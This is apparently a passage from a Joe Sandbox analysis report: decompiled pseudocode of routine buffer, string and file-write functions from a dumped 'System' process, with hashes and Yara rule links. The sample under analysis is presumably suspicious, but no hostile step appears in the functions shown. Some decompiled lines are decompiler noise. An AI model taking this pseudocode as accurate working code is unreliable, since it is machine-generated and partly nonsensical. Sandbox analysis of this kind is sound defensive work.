				E00007FF67FF6E4C64380();
				 *((char*)(_t93 + _t96)) = 0;
				if (_t82 + 1 - 0x1000 < 0) goto 0xe4c4cbb0;
				_t19 =  *_t80 -  *((intOrPtr*)(_t50 - 8)) - 8; // 0x7ffffffffffffff7
				if (_t19 - 0x1f > 0) goto 0xe4c4cbfa;
				0xe4c623d0();
				goto 0xe4c4cbd5;
				E00007FF67FF6E4C64380();
				E00007FF67FF6E4C64380();
				 *((char*)(_t93 + _t96)) = 0;
				 *_t80 = 0;
				return _t26;
			}


















                                                                                                                                                              0x7ff6e4c4ca8b
                                                                                                                                                              0x7ff6e4c4caa2
                                                                                                                                                              0x7ff6e4c4caa8
                                                                                                                                                              0x7ff6e4c4caae
                                                                                                                                                              0x7ff6e4c4cab3
                                                                                                                                                              0x7ff6e4c4cab7
                                                                                                                                                              0x7ff6e4c4cabc
                                                                                                                                                              0x7ff6e4c4cac3
                                                                                                                                                              0x7ff6e4c4caca
                                                                                                                                                              0x7ff6e4c4cad2
                                                                                                                                                              0x7ff6e4c4cadb
                                                                                                                                                              0x7ff6e4c4cae7
                                                                                                                                                              0x7ff6e4c4caee
                                                                                                                                                              0x7ff6e4c4caf7
                                                                                                                                                              0x7ff6e4c4cb03
                                                                                                                                                              0x7ff6e4c4cb0e
                                                                                                                                                              0x7ff6e4c4cb10
                                                                                                                                                              0x7ff6e4c4cb10
                                                                                                                                                              0x7ff6e4c4cb17
                                                                                                                                                              0x7ff6e4c4cb1d
                                                                                                                                                              0x7ff6e4c4cb20
                                                                                                                                                              0x7ff6e4c4cb28
                                                                                                                                                              0x7ff6e4c4cb2e
                                                                                                                                                              0x7ff6e4c4cb36
                                                                                                                                                              0x7ff6e4c4cb3a
                                                                                                                                                              0x7ff6e4c4cb3f
                                                                                                                                                              0x7ff6e4c4cb41
                                                                                                                                                              0x7ff6e4c4cb49
                                                                                                                                                              0x7ff6e4c4cb4d
                                                                                                                                                              0x7ff6e4c4cb58
                                                                                                                                                              0x7ff6e4c4cb5c
                                                                                                                                                              0x7ff6e4c4cb60
                                                                                                                                                              0x7ff6e4c4cb6b
                                                                                                                                                              0x7ff6e4c4cb6d
                                                                                                                                                              0x7ff6e4c4cb73
                                                                                                                                                              0x7ff6e4c4cb81
                                                                                                                                                              0x7ff6e4c4cb8a
                                                                                                                                                              0x7ff6e4c4cb96
                                                                                                                                                              0x7ff6e4c4cba3
                                                                                                                                                              0x7ff6e4c4cbab
                                                                                                                                                              0x7ff6e4c4cbb3
                                                                                                                                                              0x7ff6e4c4cbb8
                                                                                                                                                              0x7ff6e4c4cbbd
                                                                                                                                                              0x7ff6e4c4cbcb
                                                                                                                                                              0x7ff6e4c4cbd0
                                                                                                                                                              0x7ff6e4c4cbd5
                                                                                                                                                              0x7ff6e4c4cbf9

                                                                                                                                                              APIs
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000B.00000002.401874825.00007FF6E4C41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF6E4C40000, based on PE: true
                                                                                                                                                              • Associated: 0000000B.00000002.401841691.00007FF6E4C40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                              • Associated: 0000000B.00000002.401978343.00007FF6E4C89000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                              • Associated: 0000000B.00000002.402012688.00007FF6E4CA9000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                              • Associated: 0000000B.00000002.402023641.00007FF6E4CAC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_11_2_7ff6e4c40000_System.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturn
                                                                                                                                                              • String ID: 123
                                                                                                                                                              • API String ID: 73155330-2286445522
                                                                                                                                                              • Opcode ID: 0e9840a0b0f16a1d2ac2abd8f464c92e6208e1dd31a34945bd6da5a7d6617bba
                                                                                                                                                              • Instruction ID: 01d200a67bb948c91b974953223c07921e25dd719475ceab72b02ef6561b3fd6
                                                                                                                                                              • Opcode Fuzzy Hash: 0e9840a0b0f16a1d2ac2abd8f464c92e6208e1dd31a34945bd6da5a7d6617bba
                                                                                                                                                              • Instruction Fuzzy Hash: 3941F36775964384EE149B26A6443B9A265AB04FE0F444632DE6E877D5CE3DE042830D
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 00007FF6E4C58330 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 112fileCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000B.00000002.401874825.00007FF6E4C41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF6E4C40000, based on PE: true
                                                                                                                                                              • Associated: 0000000B.00000002.401841691.00007FF6E4C40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                              • Associated: 0000000B.00000002.401978343.00007FF6E4C89000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                              • Associated: 0000000B.00000002.402012688.00007FF6E4CA9000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                              • Associated: 0000000B.00000002.402023641.00007FF6E4CAC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_11_2_7ff6e4c40000_System.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: CloseCreateFileHandle
                                                                                                                                                              • String ID: .z%02d
                                                                                                                                                              • API String ID: 3498533004-724465191
                                                                                                                                                              • Opcode ID: 7c8913cef9b3fc7d39e5c5d494e17604399912c1ead02939bbac2fd889811e8d
                                                                                                                                                              • Instruction ID: 93944b6d5080985f38a6ecc25228f84b58c5ab48ed363312f6faf51f362f736e
                                                                                                                                                              • Opcode Fuzzy Hash: 7c8913cef9b3fc7d39e5c5d494e17604399912c1ead02939bbac2fd889811e8d
                                                                                                                                                              • Instruction Fuzzy Hash: FA419E26E4874386EA249B25A49037EA3B4EB84F90F054136DE5E87BD5CF2EE811C359
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 00007FF6E4C4B740 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 101COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              C-Code - Quality: 93%
                                                                                                                                                              			E00007FF67FF6E4C4B740(long long __rbx, long long __rcx, void* __rdx, long long __rdi, long long __rbp, void* __r8, long long _a16) {
				long long _v32;
				long long _v40;
				long long _v56;
				void* _t24;
				char _t25;
				long long _t38;
				void* _t51;
				long long _t52;
				long long _t53;
				long long _t65;
				long long* _t67;
				signed long long _t69;
				intOrPtr _t75;

				_t75 =  *((intOrPtr*)(__r8 + 0x10));
				_t67 = __rcx;
				_v56 = __rcx;
				if (0xffffffff - _t75 - 0xf < 0) goto 0xe4c4b88a;
				_a16 = __rbx;
				_v32 = __rbp;
				_v40 = __rdi;
				if ( *((long long*)(__r8 + 0x18)) - 0x10 < 0) goto 0xe4c4b78c;
				_t69 = _t75 + 0xf;
				 *((long long*)(__rcx + 0x10)) = 0;
				 *((long long*)(__rcx + 0x18)) = 0;
				if (_t69 - 0xf <= 0) goto 0xe4c4b823;
				if ((_t69 | 0x0000000f) - 0xffffffff <= 0) goto 0xe4c4b7bb;
				goto 0xe4c4b7c7;
				_t65 =  <  ? 0x16 : 0xffffffff;
				_t51 =  <  ? 0xffffffff : _t65 + 1;
				if (_t51 - 0x1000 < 0) goto 0xe4c4b80e;
				_t10 = _t51 + 0x27; // 0x8000000000000025
				_t38 = _t10;
				if (_t38 - _t51 <= 0) goto 0xe4c4b890;
				_t52 = _t38;
				E00007FF67FF6E4C623D8(_t38, _t52);
				if (_t38 == 0) goto 0xe4c4b884;
				_t11 = _t38 + 0x27; // 0x27
				 *((long long*)((_t11 & 0xffffffe0) - 8)) = _t38;
				goto 0xe4c4b820;
				if (_t52 == 0) goto 0xe4c4b81d;
				_t24 = E00007FF67FF6E4C623D8(_t38, _t52);
				goto 0xe4c4b820;
				 *_t67 = 0;
				 *(_t67 + 0x10) = _t69;
				 *((long long*)(_t67 + 0x18)) = _t65;
				asm("movsd xmm0, [0x5434f]");
				asm("movsd [ebx], xmm0");
				_t53 = M00007FF67FF6E4C9FB90; // 0x61446d61
				 *0x00000008 = _t53;
				 *0x0000000C = _t25;
				 *0x0000000E = _t25;
				E00007FF67FF6E4C64380();
				 *((char*)(0 + _t69)) = 0;
				return _t24;
			}
















                                                                                                                                                              0x7ff6e4c4b74a
                                                                                                                                                              0x7ff6e4c4b74e
                                                                                                                                                              0x7ff6e4c4b751
                                                                                                                                                              0x7ff6e4c4b76d
                                                                                                                                                              0x7ff6e4c4b778
                                                                                                                                                              0x7ff6e4c4b77d
                                                                                                                                                              0x7ff6e4c4b782
                                                                                                                                                              0x7ff6e4c4b787
                                                                                                                                                              0x7ff6e4c4b78e
                                                                                                                                                              0x7ff6e4c4b79b
                                                                                                                                                              0x7ff6e4c4b7a1
                                                                                                                                                              0x7ff6e4c4b7a8
                                                                                                                                                              0x7ff6e4c4b7b4
                                                                                                                                                              0x7ff6e4c4b7b9
                                                                                                                                                              0x7ff6e4c4b7c4
                                                                                                                                                              0x7ff6e4c4b7d5
                                                                                                                                                              0x7ff6e4c4b7e0
                                                                                                                                                              0x7ff6e4c4b7e2
                                                                                                                                                              0x7ff6e4c4b7e2
                                                                                                                                                              0x7ff6e4c4b7e9
                                                                                                                                                              0x7ff6e4c4b7ef
                                                                                                                                                              0x7ff6e4c4b7f2
                                                                                                                                                              0x7ff6e4c4b7fa
                                                                                                                                                              0x7ff6e4c4b800
                                                                                                                                                              0x7ff6e4c4b808
                                                                                                                                                              0x7ff6e4c4b80c
                                                                                                                                                              0x7ff6e4c4b811
                                                                                                                                                              0x7ff6e4c4b813
                                                                                                                                                              0x7ff6e4c4b81b
                                                                                                                                                              0x7ff6e4c4b820
                                                                                                                                                              0x7ff6e4c4b823
                                                                                                                                                              0x7ff6e4c4b82a
                                                                                                                                                              0x7ff6e4c4b831
                                                                                                                                                              0x7ff6e4c4b839
                                                                                                                                                              0x7ff6e4c4b83d
                                                                                                                                                              0x7ff6e4c4b843
                                                                                                                                                              0x7ff6e4c4b84d
                                                                                                                                                              0x7ff6e4c4b858
                                                                                                                                                              0x7ff6e4c4b85f
                                                                                                                                                              0x7ff6e4c4b86c
                                                                                                                                                              0x7ff6e4c4b883

                                                                                                                                                              APIs
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000B.00000002.401874825.00007FF6E4C41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF6E4C40000, based on PE: true
                                                                                                                                                              • Associated: 0000000B.00000002.401841691.00007FF6E4C40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                              • Associated: 0000000B.00000002.401978343.00007FF6E4C89000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                              • Associated: 0000000B.00000002.402012688.00007FF6E4CA9000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                              • Associated: 0000000B.00000002.402023641.00007FF6E4CAC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_11_2_7ff6e4c40000_System.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturn
                                                                                                                                                              • String ID: amData\
                                                                                                                                                              • API String ID: 73155330-1743613425
                                                                                                                                                              • Opcode ID: 166bbe10d734689c822bb0402666427f85af33b994acebec53c7dad649b92663
                                                                                                                                                              • Instruction ID: cabd520a15d11ae96217030438e639035a744e7fd1e5d2b51c573c1f950bf176
                                                                                                                                                              • Opcode Fuzzy Hash: 166bbe10d734689c822bb0402666427f85af33b994acebec53c7dad649b92663
                                                                                                                                                              • Instruction Fuzzy Hash: BB31B537A49B4685EA149F31A58027972B0EB04FF4F144636DBBE877D5EE3DE081834A
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 00007FF6E4C765F0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100fileCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              C-Code - Quality: 18%
                                                                                                                                                              			E00007FF67FF6E4C765F0(void* __edx, void* __edi, void* __rax, signed long long __rbx, long long* __rcx, long long __rbp, void* __r8, void* __r10, void* __r11, signed long long _a8, signed long long _a16, long long _a24, char _a40, char _a1744, char _a1752, signed int _a5176, void* _a5192) {
				long long _v0;
				signed long long _v8;
				void* _t35;
				long _t38;
				short _t40;
				void* _t43;
				void* _t44;
				short* _t64;
				void* _t65;
				signed long long _t67;
				long long _t68;
				signed long long _t95;
				void* _t105;
				void* _t106;

				_a8 = __rbx;
				_a24 = __rbp;
				 *0xFEC6B4E80000149B =  *((long long*)(0xfec6b4e80000149b)) - 1;
				asm("loopne 0x4a");
				_a5176 =  *0xe4ca90a0 ^ _t95;
				r14d = r9d;
				r10d = r10d & 0x0000003f;
				_t106 = _t105 + __r8;
				 *__rcx = 0;
				 *((long long*)(__rcx + 8)) = 0;
				if (__r8 - _t106 >= 0) goto 0xe4c76731;
				if (__r8 - _t106 >= 0) goto 0xe4c7669a;
				if (_t40 != 0xa) goto 0xe4c76686;
				_t64 =  &_a40 + 2;
				 *_t64 = _t40;
				_t65 = _t64 + 2;
				if (_t65 -  &_a1744 < 0) goto 0xe4c76668;
				_a16 = _a16 & 0x00000000;
				_a8 = _a8 & 0x00000000;
				_v0 = 0xd55;
				_t67 = _t65 -  &_a40 >> 1;
				_v8 =  &_a1752;
				r9d = _t35;
				_a40 = _a40 + _t35;
				if (_t67 == 0) goto 0xe4c76729;
				if (_t67 == 0) goto 0xe4c76719;
				_v8 = _v8 & 0x00000000;
				r8d = _t44;
				r8d = r8d - _t43;
				WriteFile(??, ??, ??, ??, ??);
				if (_t67 == 0) goto 0xe4c76729;
				if (0 + _a24 - _t67 < 0) goto 0xe4c766e6;
				_t68 = __r8 + 2;
				 *((long long*)(__rcx + 4)) = _t68;
				goto 0xe4c7665d;
				_t38 = GetLastError();
				 *__rcx = _t68;
				return E00007FF67FF6E4C623B0(_t38, _t40, _a5176 ^ _t95);
			}

















                                                                                                                                                              0x7ff6e4c765f0
                                                                                                                                                              0x7ff6e4c765f5
                                                                                                                                                              0x7ff6e4c7660b
                                                                                                                                                              0x7ff6e4c7660e
                                                                                                                                                              0x7ff6e4c76619
                                                                                                                                                              0x7ff6e4c7662a
                                                                                                                                                              0x7ff6e4c76638
                                                                                                                                                              0x7ff6e4c7663c
                                                                                                                                                              0x7ff6e4c76654
                                                                                                                                                              0x7ff6e4c7665a
                                                                                                                                                              0x7ff6e4c7665d
                                                                                                                                                              0x7ff6e4c7666b
                                                                                                                                                              0x7ff6e4c76678
                                                                                                                                                              0x7ff6e4c76683
                                                                                                                                                              0x7ff6e4c76686
                                                                                                                                                              0x7ff6e4c76689
                                                                                                                                                              0x7ff6e4c76698
                                                                                                                                                              0x7ff6e4c7669a
                                                                                                                                                              0x7ff6e4c766a5
                                                                                                                                                              0x7ff6e4c766b3
                                                                                                                                                              0x7ff6e4c766c3
                                                                                                                                                              0x7ff6e4c766c6
                                                                                                                                                              0x7ff6e4c766cb
                                                                                                                                                              0x7ff6e4c766d7
                                                                                                                                                              0x7ff6e4c766de
                                                                                                                                                              0x7ff6e4c766e4
                                                                                                                                                              0x7ff6e4c766e6
                                                                                                                                                              0x7ff6e4c766fb
                                                                                                                                                              0x7ff6e4c76704
                                                                                                                                                              0x7ff6e4c76707
                                                                                                                                                              0x7ff6e4c7670f
                                                                                                                                                              0x7ff6e4c76717
                                                                                                                                                              0x7ff6e4c76719
                                                                                                                                                              0x7ff6e4c7671e
                                                                                                                                                              0x7ff6e4c76724
                                                                                                                                                              0x7ff6e4c76729
                                                                                                                                                              0x7ff6e4c7672f
                                                                                                                                                              0x7ff6e4c7675f

                                                                                                                                                              APIs
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000B.00000002.401874825.00007FF6E4C41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF6E4C40000, based on PE: true
                                                                                                                                                              • Associated: 0000000B.00000002.401841691.00007FF6E4C40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                              • Associated: 0000000B.00000002.401978343.00007FF6E4C89000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                              • Associated: 0000000B.00000002.402012688.00007FF6E4CA9000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                              • Associated: 0000000B.00000002.402023641.00007FF6E4CAC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_11_2_7ff6e4c40000_System.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: ErrorFileLastWrite
                                                                                                                                                              • String ID: U
                                                                                                                                                              • API String ID: 442123175-4171548499
                                                                                                                                                              • Opcode ID: 8784abe35501bf7c6ace227215c306902726a7b9a16041936dd4e58c3eb03d5e
                                                                                                                                                              • Instruction ID: 2676c5b70fa2fc36e68405e32df9833eefbc2e27c5db1c1e7cd72d96966a5ebf
                                                                                                                                                              • Opcode Fuzzy Hash: 8784abe35501bf7c6ace227215c306902726a7b9a16041936dd4e58c3eb03d5e
                                                                                                                                                              • Instruction Fuzzy Hash: 24419F27B19A8686DB108F35E4883A967B0FB88B94F804036EE4EC7784EF3DD401C745
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 00007FF6E4C7C094 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 85COMMONLIBRARYCODE
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              C-Code - Quality: 52%
                                                                                                                                                              			E00007FF67FF6E4C7C094(void* __esi, char* __rax, long long __rbx, long long* __rcx, intOrPtr* __rdx, long long __rdi, long long __rsi, long long __r8, void* __r9, long long _a8, long long _a16, long long _a24, long long _a40, intOrPtr _a48) {
				intOrPtr _v32;
				void* _v48;
				char _v56;
				signed int _t44;
				void* _t47;
				char* _t64;
				signed long long _t76;
				intOrPtr* _t83;
				void* _t88;
				long long _t93;
				long long _t96;
				void* _t97;

				_t64 = __rax;
				_a8 = __rbx;
				_a16 = __rsi;
				_a24 = __rdi;
				r12d = 0;
				_t83 = __rdx;
				if (__rdx != 0) goto 0xe4c7c110;
				if (__r8 != 0) goto 0xe4c7c115;
				if (__rdx == 0) goto 0xe4c7c0d2;
				 *__rdx = r12w;
				if (__rcx == 0) goto 0xe4c7c0da;
				 *__rcx = _t96;
				_t76 =  &_v56;
				E00007FF67FF6E4C686F4(__rax, __rbx, _t76, _a48, __r8);
				_t93 = _a40;
				_t94 =  >  ? __r8 : _t93;
				_t56 = ( >  ? __r8 : _t93) - 0x7fffffff;
				if (( >  ? __r8 : _t93) - 0x7fffffff <= 0) goto 0xe4c7c12b;
				E00007FF67FF6E4C6C854(_t64);
				E00007FF67FF6E4C6C854(_t64);
				asm("in al, 0xfe");
				asm("invalid");
				 *_t64 =  *_t64;
				 *((intOrPtr*)(_t88 + 0x4c + _t76 * 4)) =  *((intOrPtr*)(_t88 + 0x4c + _t76 * 4)) + _t47;
				E00007FF67FF6E4C7BE90(__esi, _t64, 0x16, _t83, __r9, __r8,  >  ? __r8 : _t93, __r9);
				if (_t64 != 0xffffffff) goto 0xe4c7c153;
				if (_t83 == 0) goto 0xe4c7c14a;
				 *_t83 = r12w;
				E00007FF67FF6E4C6C854(_t64);
				goto 0xe4c7c198;
				if (_t83 == 0) goto 0xe4c7c190;
				if (_t64 + 1 - __r8 <= 0) goto 0xe4c7c18a;
				if (_a40 == 0xffffffff) goto 0xe4c7c182;
				 *_t83 = r12w;
				_t44 = E00007FF67FF6E4C6C854(_t64 + 1);
				asm("in al, 0xfe");
				asm("invalid");
				asm("push ss");
				 *((char*)(_t97 - 0x7b)) =  *((char*)(_t97 - 0x7b)) - 1;
				 *((long long*)(__r8)) = __r8;
				if (_v32 == r12b) goto 0xe4c7c1ab;
				 *(_v56 + 0x3a8) =  *(_v56 + 0x3a8) & 0xfffffffd;
				return _t44 /  *(0x50 + __r8 + 0x49);
			}















                                                                                                                                                              0x7ff6e4c7c094
                                                                                                                                                              0x7ff6e4c7c094
                                                                                                                                                              0x7ff6e4c7c099
                                                                                                                                                              0x7ff6e4c7c09e
                                                                                                                                                              0x7ff6e4c7c0ad
                                                                                                                                                              0x7ff6e4c7c0b6
                                                                                                                                                              0x7ff6e4c7c0c2
                                                                                                                                                              0x7ff6e4c7c0c7
                                                                                                                                                              0x7ff6e4c7c0cc
                                                                                                                                                              0x7ff6e4c7c0ce
                                                                                                                                                              0x7ff6e4c7c0d5
                                                                                                                                                              0x7ff6e4c7c0d7
                                                                                                                                                              0x7ff6e4c7c0e2
                                                                                                                                                              0x7ff6e4c7c0e7
                                                                                                                                                              0x7ff6e4c7c0ec
                                                                                                                                                              0x7ff6e4c7c0f7
                                                                                                                                                              0x7ff6e4c7c0fb
                                                                                                                                                              0x7ff6e4c7c102
                                                                                                                                                              0x7ff6e4c7c104
                                                                                                                                                              0x7ff6e4c7c115
                                                                                                                                                              0x7ff6e4c7c123
                                                                                                                                                              0x7ff6e4c7c125
                                                                                                                                                              0x7ff6e4c7c127
                                                                                                                                                              0x7ff6e4c7c12a
                                                                                                                                                              0x7ff6e4c7c136
                                                                                                                                                              0x7ff6e4c7c13f
                                                                                                                                                              0x7ff6e4c7c144
                                                                                                                                                              0x7ff6e4c7c146
                                                                                                                                                              0x7ff6e4c7c14a
                                                                                                                                                              0x7ff6e4c7c151
                                                                                                                                                              0x7ff6e4c7c159
                                                                                                                                                              0x7ff6e4c7c15e
                                                                                                                                                              0x7ff6e4c7c169
                                                                                                                                                              0x7ff6e4c7c16b
                                                                                                                                                              0x7ff6e4c7c16f
                                                                                                                                                              0x7ff6e4c7c17d
                                                                                                                                                              0x7ff6e4c7c17f
                                                                                                                                                              0x7ff6e4c7c181
                                                                                                                                                              0x7ff6e4c7c18e
                                                                                                                                                              0x7ff6e4c7c196
                                                                                                                                                              0x7ff6e4c7c19d
                                                                                                                                                              0x7ff6e4c7c1a4
                                                                                                                                                              0x7ff6e4c7c1c6

                                                                                                                                                              APIs
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000B.00000002.401874825.00007FF6E4C41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF6E4C40000, based on PE: true
                                                                                                                                                              • Associated: 0000000B.00000002.401841691.00007FF6E4C40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                              • Associated: 0000000B.00000002.401978343.00007FF6E4C89000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                              • Associated: 0000000B.00000002.402012688.00007FF6E4CA9000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                              • Associated: 0000000B.00000002.402023641.00007FF6E4CAC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_11_2_7ff6e4c40000_System.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: _invalid_parameter_noinfo
                                                                                                                                                              • String ID: 123
                                                                                                                                                              • API String ID: 3215553584-2286445522
                                                                                                                                                              • Opcode ID: 197765336227ce6d74bb465400ab26fa7ec5dcf5122b1c6d9b74055baa487a5d
                                                                                                                                                              • Instruction ID: 03f67a2387c0f2a321e262e84ce1871b46fff390f302018b026c93070c570e6c
                                                                                                                                                              • Opcode Fuzzy Hash: 197765336227ce6d74bb465400ab26fa7ec5dcf5122b1c6d9b74055baa487a5d
                                                                                                                                                              • Instruction Fuzzy Hash: 8B31916BA4C78343E6619A3195C43796670BF44FE0F508232DB6C87BD5CE3E9451870A
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 00007FF6E4C7C9D4 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 80COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              C-Code - Quality: 45%
                                                                                                                                                              			E00007FF67FF6E4C7C9D4() {
				void* _t34;
				long long _t35;
				void* _t36;
				void* _t37;
				void* _t38;
				void* _t39;
				void* _t40;
				void* _t41;
				void* _t51;
				void* _t52;
				void* _t53;

				_t51 = _t52 - 0x5f;
				_t53 = _t52 - 0x90;
				asm("movaps [eax-0x18], xmm6");
				asm("movaps xmm6, xmm2");
				if (_t40 == 0) goto 0xe4c7cb0c;
				_t41 = r9d - _t34;
				if (_t41 == 0) goto 0xe4c7cad9;
				if (_t41 <= 0) goto 0xe4c7cb4b;
				if (r9d - 5 <= 0) goto 0xe4c7caca;
				if (r9d == 6) goto 0xe4c7ca9c;
				if (r9d == 7) goto 0xe4c7ca63;
				if (r9d != 9) goto 0xe4c7cb4b;
				 *(_t51 + 0x17) =  *(_t51 + 0x17) & 0x00000000;
				r9d = 0x1f9834100000003;
				 *((long long*)(_t53 + 0x40)) = 0x2;
				asm("movss [esp+0x38], xmm1");
				asm("movss [esp+0x30], xmm0");
				 *(_t53 + 0x28) = 0x22;
				asm("movss [ebp+0x17], xmm6");
				 *((long long*)(_t53 + 0x20)) = 0x11;
				goto 0xe4c7cb3a;
				 *(_t51 + 0x1f) =  *(_t51 + 0x1f) & 0x00000000;
				r9d = 4;
				 *((long long*)(_t53 + 0x40)) = 0x2;
				asm("movss [esp+0x38], xmm1");
				asm("movss [esp+0x30], xmm0");
				 *(_t53 + 0x28) = 0x22;
				asm("movss [ebp+0x1f], xmm6");
				 *((long long*)(_t53 + 0x20)) = 0x12;
				goto 0xe4c7cb3a;
				 *(_t51 + 0x27) =  *(_t51 + 0x27) & 0x00000000;
				r9d = 1;
				 *((long long*)(_t53 + 0x40)) = 0x2;
				asm("movss [esp+0x38], xmm1");
				asm("movss [esp+0x30], xmm0");
				asm("movss [ebp+0x27], xmm6");
				 *(_t53 + 0x28) = 0x21;
				goto 0xe4c7cb32;
				asm("movss [ebp+0x7f], xmm6");
				_t35 = E00007FF67FF6E4C84CC0(_t34, _t38);
				goto 0xe4c7cb4e;
				 *(_t51 + 0x2f) =  *(_t51 + 0x2f) & 0x00000000;
				r9d = _t35;
				 *((long long*)(_t53 + 0x40)) = 0x2;
				asm("movss [esp+0x38], xmm1");
				asm("movss [esp+0x30], xmm0");
				 *(_t53 + 0x28) = 0x22;
				asm("movss [ebp+0x2f], xmm6");
				 *((long long*)(_t53 + 0x20)) = 4;
				goto 0xe4c7cb3a;
				 *(_t51 + 0x37) =  *(_t51 + 0x37) & 0x00000000;
				 *((long long*)(_t53 + 0x40)) = 0x2;
				asm("movss [esp+0x38], xmm1");
				asm("movss [esp+0x30], xmm0");
				 *(_t53 + 0x28) =  *(_t53 + 0x28) & 0x00000000;
				asm("movss [ebp+0x37], xmm6");
				r9d = 0;
				 *((long long*)(_t53 + 0x20)) = 8;
				asm("retf");
				 *0x2 =  *0x2 + 0x2;
				_t36 = E00007FF67FF6E4C84B70(_t37, _t39,  *0x2,  *((intOrPtr*)(_t51 + 0x7f)), 0x1d,  *(_t51 + 0x37));
				asm("movaps xmm0, xmm6");
				asm("movaps xmm6, [esp+0x80]");
				return _t36;
			}














                                                                                                                                                              0x7ff6e4c7c9d8
                                                                                                                                                              0x7ff6e4c7c9dc
                                                                                                                                                              0x7ff6e4c7c9e3
                                                                                                                                                              0x7ff6e4c7c9e7
                                                                                                                                                              0x7ff6e4c7c9f3
                                                                                                                                                              0x7ff6e4c7c9f9
                                                                                                                                                              0x7ff6e4c7c9fc
                                                                                                                                                              0x7ff6e4c7ca02
                                                                                                                                                              0x7ff6e4c7ca0c
                                                                                                                                                              0x7ff6e4c7ca16
                                                                                                                                                              0x7ff6e4c7ca20
                                                                                                                                                              0x7ff6e4c7ca26
                                                                                                                                                              0x7ff6e4c7ca2c
                                                                                                                                                              0x7ff6e4c7ca31
                                                                                                                                                              0x7ff6e4c7ca35
                                                                                                                                                              0x7ff6e4c7ca39
                                                                                                                                                              0x7ff6e4c7ca3f
                                                                                                                                                              0x7ff6e4c7ca45
                                                                                                                                                              0x7ff6e4c7ca4d
                                                                                                                                                              0x7ff6e4c7ca56
                                                                                                                                                              0x7ff6e4c7ca5e
                                                                                                                                                              0x7ff6e4c7ca63
                                                                                                                                                              0x7ff6e4c7ca68
                                                                                                                                                              0x7ff6e4c7ca6e
                                                                                                                                                              0x7ff6e4c7ca72
                                                                                                                                                              0x7ff6e4c7ca78
                                                                                                                                                              0x7ff6e4c7ca7e
                                                                                                                                                              0x7ff6e4c7ca86
                                                                                                                                                              0x7ff6e4c7ca8f
                                                                                                                                                              0x7ff6e4c7ca97
                                                                                                                                                              0x7ff6e4c7ca9c
                                                                                                                                                              0x7ff6e4c7caa1
                                                                                                                                                              0x7ff6e4c7caa7
                                                                                                                                                              0x7ff6e4c7caab
                                                                                                                                                              0x7ff6e4c7cab1
                                                                                                                                                              0x7ff6e4c7cab7
                                                                                                                                                              0x7ff6e4c7cac0
                                                                                                                                                              0x7ff6e4c7cac8
